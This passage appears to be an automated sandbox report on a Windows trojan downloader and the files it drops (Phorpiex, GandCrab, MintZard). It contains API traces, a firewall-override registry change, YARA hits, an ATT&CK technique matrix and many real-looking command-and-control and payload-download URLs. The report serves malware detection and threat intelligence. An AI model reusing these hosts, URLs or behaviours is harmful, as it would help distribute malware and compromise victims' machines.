                            Source: C:\Users\user\winploravr.exeCode function: memset,GetLocaleInfoA,strcmp,9_2_002A1740
                            Source: C:\Windows\winploravr.exeCode function: memset,GetLocaleInfoA,strcmp,14_2_000F1740
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeCode function: 7_2_00DB2568 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,7_2_00DB2568
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeCode function: 10_2_00D71490 GetLocalTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeZoneInformation,wsprintfA,wsprintfA,10_2_00D71490
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\sysbrapsvc.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center FirewallOverride

Remote Access Functionality

Source: Yara match | File source: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe, type: SAMPLE
Source: Yara match | File source: 5.0.3193211493.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.sysbrapsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.sysbrapsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.3193211493.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.sysbrapsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.sysbrapsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1395571963.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.1558944525.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.1416106928.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.1544428131.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1665949097.0000000004781000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1416145697.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe PID: 6832, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: sysbrapsvc.exe PID: 5588, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: sysbrapsvc.exe PID: 768, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 3193211493.exe PID: 3640, type: MEMORYSTR
Source: Yara match | File source: C:\Windows\sysbrapsvc.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\3193211493.exe, type: DROPPED
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Code function: 0_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,0_2_00401470
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Code function: 0_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,0_2_00402020
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Code function: 0_2_0040DBC0 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,0_2_0040DBC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Code function: 0_2_004013B0 CreateEventA,socket,bind,CreateThread,0_2_004013B0
Source: C:\Windows\sysbrapsvc.exe | Code function: 2_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,2_2_00401470
Source: C:\Windows\sysbrapsvc.exe | Code function: 2_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,2_2_00402020
Source: C:\Windows\sysbrapsvc.exe | Code function: 2_2_0040DBC0 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,2_2_0040DBC0
Source: C:\Windows\sysbrapsvc.exe | Code function: 2_2_004013B0 CreateEventA,socket,bind,CreateThread,2_2_004013B0
Source: C:\Windows\sysbrapsvc.exe | Code function: 4_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,4_2_00401470
Source: C:\Windows\sysbrapsvc.exe | Code function: 4_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,4_2_00402020
Source: C:\Windows\sysbrapsvc.exe | Code function: 4_2_0040DBC0 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,4_2_0040DBC0
Source: C:\Windows\sysbrapsvc.exe | Code function: 4_2_004013B0 CreateEventA,socket,bind,CreateThread,4_2_004013B0
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | Code function: 5_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,5_2_00401470
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | Code function: 5_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,5_2_00402020
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | Code function: 5_2_0040DBC0 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,5_2_0040DBC0
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | Code function: 5_2_004013B0 CreateEventA,socket,bind,CreateThread,5_2_004013B0
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 11 Input Capture | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 Data Encrypted for Impact
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 Windows Service | 1 Windows Service | 1 Obfuscated Files or Information | LSASS Memory | 2 System Network Connections Discovery | Remote Desktop Protocol | 11 Input Capture | 2 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 1 Registry Run Keys / Startup Folder | 1 Process Injection | 1 DLL Side-Loading | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 231 Masquerading | NTDS | 15 System Information Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 21 Virtualization/Sandbox Evasion | LSA Secrets | 231 Security Software Discovery | SSH | Keylogging | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Process Injection | Cached Domain Credentials | 21 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Hidden Files and Directories | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
[Behavior Graph ID 1438295 (rendered graph not preserved in text): sample SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe, start date 08/05/2024, architecture WINDOWS, score 100; contacted domains twizt.net, yahoo.com, mta7.am0.yahoodns.net]

Source | Detection | Scanner | Label | Link
SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | 79% | ReversingLabs | Win32.Trojan.MintZard |
SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | 100% | Avira | HEUR/AGEN.1360619 |
SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Windows\sysbrapsvc.exe | 100% | Avira | HEUR/AGEN.1360619 |
C:\Users\user\AppData\Local\Temp\3193211493.exe | 100% | Avira | HEUR/AGEN.1360619 |
C:\Users\user\AppData\Local\Temp\330125677.exe | 100% | Joe Sandbox ML | |
C:\Users\user\winploravr.exe | 100% | Joe Sandbox ML | |
C:\Windows\sysbrapsvc.exe | 100% | Joe Sandbox ML | |
C:\Users\user\winploravr.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\2006625995.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\3193211493.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\1146722911.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\1146722911.exe | 96% | ReversingLabs | Win32.Worm.Phorpiex |
C:\Users\user\AppData\Local\Temp\1245832676.exe | 30% | ReversingLabs | Win32.Trojan.Generic |
C:\Users\user\AppData\Local\Temp\2303012543.exe | 30% | ReversingLabs | Win32.Trojan.Generic |
C:\Users\user\AppData\Local\Temp\2711236308.exe | 30% | ReversingLabs | Win32.Trojan.Generic |
C:\Users\user\AppData\Local\Temp\300129380.exe | 38% | ReversingLabs | Win32.Ransomware.GandCrab |
C:\Users\user\AppData\Local\Temp\3193211493.exe | 79% | ReversingLabs | Win32.Trojan.MintZard |
C:\Users\user\AppData\Local\Temp\330125677.exe | 62% | ReversingLabs | Win32.Trojan.Zusy |
C:\Users\user\winploravr.exe | 96% | ReversingLabs | Win32.Worm.Phorpiex |
C:\Windows\sysbrapsvc.exe | 79% | ReversingLabs | Win32.Trojan.MintZard |
C:\Windows\winploravr.exe | 96% | ReversingLabs | Win32.Worm.Phorpiex |
                            No Antivirus matches
                            No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mta7.am0.yahoodns.net | 67.195.228.94 | true | false | - | unknown
twizt.net | 185.215.113.66 | true | true | - | unknown
yahoo.com | unknown | unknown | false | - | high
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.66/_3 | true | Avira URL Cloud: safe | unknown
http://185.215.113.66/_1 | true | Avira URL Cloud: safe | unknown
http://185.215.113.66/_2 | true | Avira URL Cloud: safe | unknown
http://91.202.233.141/1 | false | Avira URL Cloud: safe | unknown
http://91.202.233.141/2 | false | Avira URL Cloud: safe | unknown
http://91.202.233.141/5 | false | Avira URL Cloud: safe | unknown
http://91.202.233.141/6 | false | Avira URL Cloud: safe | unknown
http://91.202.233.141/3 | false | Avira URL Cloud: safe | unknown
http://91.202.233.141/4 | false | Avira URL Cloud: safe | unknown
http://185.215.113.66/5 | true | Avira URL Cloud: safe | unknown
http://185.215.113.66/4 | true | Avira URL Cloud: safe | unknown
http://185.215.113.66/3 | true | Avira URL Cloud: safe | unknown
http://185.215.113.66/2 | true | Avira URL Cloud: safe | unknown
http://185.215.113.66/6 | true | Avira URL Cloud: malware | unknown
http://185.215.113.66/1 | true | Avira URL Cloud: safe | unknown
http://91.202.233.141/_1 | false | Avira URL Cloud: safe | unknown
http://91.202.233.141/_2 | false | Avira URL Cloud: safe | unknown
http://91.202.233.141/_3 | false | Avira URL Cloud: safe | unknown
http://twizt.net/ALLSTATA | true | Avira URL Cloud: phishing | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://193.233.132.177/_2g | 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.66/reg.php?s=%s | sysbrapsvc.exe, 00000002.00000002.3863143068.0000000002263000.00000004.00000020.00020000.00000000.sdmp, 300129380.exe, 00000012.00000000.2034540259.00000000003F2000.00000002.00000001.01000000.00000010.sdmp, 300129380.exe, 00000012.00000002.2075465997.00000000003F2000.00000002.00000001.01000000.00000010.sdmp, 300129380.exe.2.dr | false | Avira URL Cloud: safe | unknown
http://185.215.113.66/_36o | 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://193.233.132.177/2S | sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.66/_32_p0 | 1146722911.exe, 00000007.00000002.3854688865.000000000073A000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://icanhazip.com/. | sysbrapsvc.exe, 00000002.00000002.3866327336.0000000004780000.00000004.00000020.00020000.00000000.sdmp, 2006625995.exe, 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe, 0000000A.00000000.1869234828.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe.2.dr | false | - | high
http://193.233.132.177/4# | sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://193.233.132.177/3C | sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://193.233.132.177/3h.dll | sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006E1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.66/_3qh | 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://91.202.233.141/_3yh | 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://twizt.net/ALLSTATAo | 330125677.exe, 0000000F.00000002.2003173720.0000000000586000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://91.202.233.141/_11N:we | 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.66/3:( | 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.66/5P | 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://193.233.132.177/377 | sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006E1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://twizt.net/ | 330125677.exe, 0000000F.00000002.2003173720.00000000005B5000.00000004.00000020.00020000.00000000.sdmp, 330125677.exe, 0000000F.00000002.2003173720.000000000059D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://twizt.net/ALLSTATAopen%temp%%s | 330125677.exe, 0000000F.00000000.1953132722.00000000006F2000.00000002.00000001.01000000.0000000E.sdmp, 330125677.exe, 0000000F.00000002.2003454543.00000000006F2000.00000002.00000001.01000000.0000000E.sdmp, 330125677.exe.2.dr | false | Avira URL Cloud: phishing | unknown
http://91.202.233.141/_1K | 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.66/1http://185.215.113.66/2http://185.215.113.66/3http://185.215.113.66/4http://1 | 1146722911.exe, 00000007.00000003.1910029752.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.2077440779.0000000000948000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 00000008.00000002.1835645127.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2303012543.exe, 00000008.00000000.1812033421.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2711236308.exe, 0000000D.00000000.1899350021.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 2711236308.exe, 0000000D.00000002.1922511863.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 1245832676.exe, 00000010.00000002.2002860565.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 1245832676.exe, 00000010.00000000.1982341413.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 2711236308.exe.7.dr, 2303012543.exe.7.dr, 1245832676.exe.7.dr | false | Avira URL Cloud: safe | unknown
http://185.215.113.66/_1Ih | 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | 3193211493.exe.2.dr | false | - | high
http://91.202.233.141/6P | sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006D4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://91.202.233.141/5G4 | sysbrapsvc.exe, 00000002.00000002.3857411843.000000000060E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://91.202.233.141/_16 | 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.66/2H | sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://91.202.233.141/5e | sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006D4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.66/2O | sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.66/_1/ | 1146722911.exe, 00000007.00000002.3857092737.00000000008DE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://91.202.233.141/_11 | 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.66/reg.php?s=%sMozilla/5.0 | sysbrapsvc.exe, 00000002.00000002.3863143068.0000000002263000.00000004.00000020.00020000.00000000.sdmp, 300129380.exe, 00000012.00000000.2034540259.00000000003F2000.00000002.00000001.01000000.00000010.sdmp, 300129380.exe, 00000012.00000002.2075465997.00000000003F2000.00000002.00000001.01000000.00000010.sdmp, 300129380.exe.2.dr | false | Avira URL Cloud: safe | unknown
https://nexo.com/buy-crypto/bitcoin-btc | 2006625995.exe, 2006625995.exe, 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe, 0000000A.00000000.1869234828.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe.2.dr | false | Avira URL Cloud: safe | unknown
https://bitpay.com/buy-bitcoin/?crypto=BTC | 2006625995.exe, 2006625995.exe, 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe, 0000000A.00000000.1869234828.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe.2.dr | false | - | high
http://91.202.233.141/5V | sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.66/61( | 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://91.202.233.141/5Y | sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006D4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://91.202.233.141/6.F; | sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.66/_36U | 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://91.202.233.141/4e | sysbrapsvc.exe, 00000002.00000002.3857411843.000000000060E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://twizt.net/ALLSTATAnt | 330125677.exe, 0000000F.00000002.2003173720.000000000055E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://185.215.113.66/3T | sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://paybis.com/ | 2006625995.exe, 2006625995.exe, 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe, 0000000A.00000000.1869234828.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe.2.dr | false | - | high
http://185.215.113.66/_1_ | 1146722911.exe, 00000007.00000002.3857092737.00000000008DE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.66/1A | sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://91.202.233.141/ | winploravr.exe, winploravr.exe, 0000000E.00000002.1927342041.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp, winploravr.exe, 0000000E.00000000.1906559266.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp, winploravr.exe, 00000011.00000002.2008324273.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp, winploravr.exe, 00000011.00000000.1987852595.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp, SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe, winploravr.exe.7.dr, sysbrapsvc.exe.0.dr, winploravr.exe0.7.dr, 3193211493.exe.2.dr, 1146722911.exe.2.dr | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/envelope/ | 3193211493.exe.2.dr | false | - | high
http://193.233.132.177/31A | sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006E1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://91.202.233.141/1xF; | sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://icanhazip.com/ | sysbrapsvc.exe, 00000002.00000002.3866327336.0000000004780000.00000004.00000020.00020000.00000000.sdmp, 2006625995.exe, 2006625995.exe, 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe, 0000000A.00000000.1869234828.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe.2.dr | false | - | high
http://185.215.113.66/2.233.141/ | 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.66/_2Yk | 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://193.233.132.177/_2ih0d. | 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.66/_36 | 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.66/_2ah(d- | 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://193.233.132.177/_2 | 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://91.202.233.141/1S4 | sysbrapsvc.exe, 00000002.00000002.3857411843.000000000060E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.66/_2d | 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.66/der | sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://193.233.132.177/_3 | 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.66/http://91.202.233.141/http://193.233.132.177/123456%s%s%s:Zone.Identifier%user | SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe, sysbrapsvc.exe.0.dr, 3193211493.exe.2.dr | false | Avira URL Cloud: safe | unknown
http://twizt.net/ALLSTATAWaIG2 | 330125677.exe, 0000000F.00000002.2003173720.0000000000586000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
https://cex.io/buy-bitcoins | 2006625995.exe, 2006625995.exe, 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe, 0000000A.00000000.1869234828.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe.2.dr | false | - | high
http://185.215.113.66/3KKC: | sysbrapsvc.exe, 00000002.00000003.1794514607.0000000000692000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.66/ | winploravr.exe, winploravr.exe, 0000000E.00000002.1927342041.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp, winploravr.exe, 0000000E.00000000.1906559266.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp, winploravr.exe, 00000011.00000002.2008324273.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp, winploravr.exe, 00000011.00000000.1987852595.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp, SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe, winploravr.exe.7.dr, sysbrapsvc.exe.0.dr, winploravr.exe0.7.dr, 3193211493.exe.2.dr, 1146722911.exe.2.dr | false | Avira URL Cloud: safe | unknown
http://193.233.132.177/_21hXd# | 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.66/_2Ah | 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://twizt.net/ALLSTATA7a | 330125677.exe, 0000000F.00000002.2003173720.0000000000586000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://193.233.132.177/_3Qh8d/ | 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://193.233.132.177/ | winploravr.exe, winploravr.exe, 0000000E.00000002.1927342041.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp, winploravr.exe, 0000000E.00000000.1906559266.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp, winploravr.exe, 00000011.00000002.2008324273.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp, winploravr.exe, 00000011.00000000.1987852595.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp, SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe, winploravr.exe.7.dr, sysbrapsvc.exe.0.dr, winploravr.exe0.7.dr, 3193211493.exe.2.dr, 1146722911.exe.2.dr | false | Avira URL Cloud: safe | unknown
http://193.233.132.177/3s | sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.66/_3t | 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://193.233.132.177/6 | sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://193.233.132.177/5 | sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
